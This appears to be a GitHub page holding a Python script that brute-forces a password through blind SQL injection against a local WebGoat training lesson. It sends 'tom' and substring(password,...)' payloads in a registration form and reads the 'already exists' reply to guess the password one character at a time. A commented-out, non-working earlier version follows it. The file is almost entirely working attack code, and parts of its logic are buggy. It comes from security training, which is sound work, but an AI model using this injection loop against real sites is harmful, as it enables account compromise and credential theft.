-
Notifications
You must be signed in to change notification settings - Fork 0
/
sql_login_form.py
74 lines (61 loc) · 2.19 KB
/
sql_login_form.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!C:\Python36/python.exe
#script injection pour nombre de champs
#import httplib, urllib
import json
import requests
url='http://192.168.136.129:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4'
cara='qwertyuiopasdfghjklzxcvbnm1234567890'
def guess_the_pass(i):
for c in range(0,37):
injection="tom' and substring(password, 1,{})='{}".format(i,cara[c]);
print(injection)
data={'username_reg':injection,'email_reg':'[email protected]','password_reg':'123456','confirm_password':'123456'}
# headers={"Content-type":"application/x-www-form-urlencoded","Accept":"text/plain"}
headers = {
'Cookie': "JSESSIONID=ctnNZeiZN-5zi6atSExz9gVwNykATX3OWs6XVuY9",
}
conn = requests.put(url,headers=headers,data=data)
#rep=conn.getresponse();
page_retour= conn.json()
print(page_retour)
if 'already exists' in page_retour:
print("there is ")
print(conn.status_code)
print(cara[c], end= " ")
i+=1
guess_the_pass(i)
#print("Le login est :" ,login)
else:
continue
guess_the_pass(1)
'''
print(r)
print(r.content)
file = open("response.html",'wb')
file.write(r.content)
file.close()
'''
'''
site="192.168.126.139"
port=8080
page"/WebGoat/start.mvc"+"#lesson/SqlInjectionAdvanced.lesson/4"
cara='qwertyuiopasdfghjklzxcvbnm1234567890'
for n in range(1,6):
for c in range(0,37):
injection="tom' and substring(password, 1,1)='"+cara[c];
print(injection)
paramaters=urllib.URLencode{'username_reg':injection,'email_reg':'[email protected]','mdp':'password_reg':'123456','confirm_password':'123456','valider':'Valider'})}
headers={"Content-type":"application/x-www-form-urlencoded","Accept":"text/plain"}
try:
conn = httplib.HTTPConnection(site+":"+str(port))
conn.request("POST",page,parameters,headers)
rep=conn.getresponse();
page_retour= rep.read()
if 'Verfiez ' in page_retour:
login =login+carac[c:c+1]
break
print("Le login est :" ,login)
except as e:
print(e)
conn.close()
'''